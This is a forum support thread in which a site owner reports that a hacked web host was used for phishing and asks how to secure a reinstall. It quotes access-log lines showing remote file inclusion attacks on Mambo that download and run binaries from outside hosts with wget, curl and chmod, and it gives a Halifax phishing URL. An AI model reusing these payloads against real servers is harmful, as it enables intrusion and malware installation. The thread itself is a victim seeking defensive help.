General Support: I'VE BEN HACKED BIG TIME!

My site was hacked by someone doing a phishing scam. Here is the code my service provided sent me.
........................................................................................................................................
It seems some files on your site are vulnerable to hack attempts. Every minute you get atleast 5 hack attempts being made to your site. Here is a sample of the hack attempts:-

80.48.159.254 - - [05/Apr/2006:08:23:24 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.48.159.254 - - [05/Apr/2006:08:23:25 -0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.48.159.254 - - [05/Apr/2006:08:23:26 -0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.186 - - [07/Apr/2006:17:00:13 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo| HTTP/1.1" 400 375 "-" "-"
218.44.74.186 - - [07/Apr/2006:17:00:14 -0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo| HTTP/1.1" 400 375 "-" "-"
218.44.74.186 - - [07/Apr/2006:17:00:16 -0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo| HTTP/1.1" 400 375 "-" "-"
81.29.75.120 - - [10/Apr/2006:15:27:32 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20ar%20http://207.90.211.54/ar;chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.............................................................................................................................................

Additionally they sent this:
There was some password phishing files located at:

http://fotograbber.com/gallery/mem_bin/FormsLogin.asp/source=halifaxcouk/Halifax/

Is there a fix for this? I don't have a clue on how to correct this. My service provider is setting me up on another server so I can do a fresh install, but I want to make sure I set it up without being vulnerable to this or any other type of hacking.

Admittedly, I never gave much thought to security or being hacked. The old "It can't happen to me" mentality. Lesson learned the hard way.

It goes without saying, your help with this issue will be greatly appreciated.

Best Regards,
T2

I don't even know what Mambo is so I would say no unless this is something that would already be on the serve.

With my limited knowledge (and limited it is) it looks to me the hack has something to do with GLOBALS and the $GET variable.

Is that possible?

T2

No. However I did have an index2.php when I was customizing the home page and wanted to have the original index file available just in case I screwed something up. The mambo part is a mystery to me.

I just deleted the gallery and everything else I could on the original server so there is nothing to check there at this point. I hope this won't affect your ability to figure this out.

If Plogger itself could not be hacked in this way, would you have any idea where the security gap could be?

Thanks Mike,
T2

I think you're right. There were phishing files in my directory that I could not delete which suggests the hack was at the server root. Thanks for your input.

T2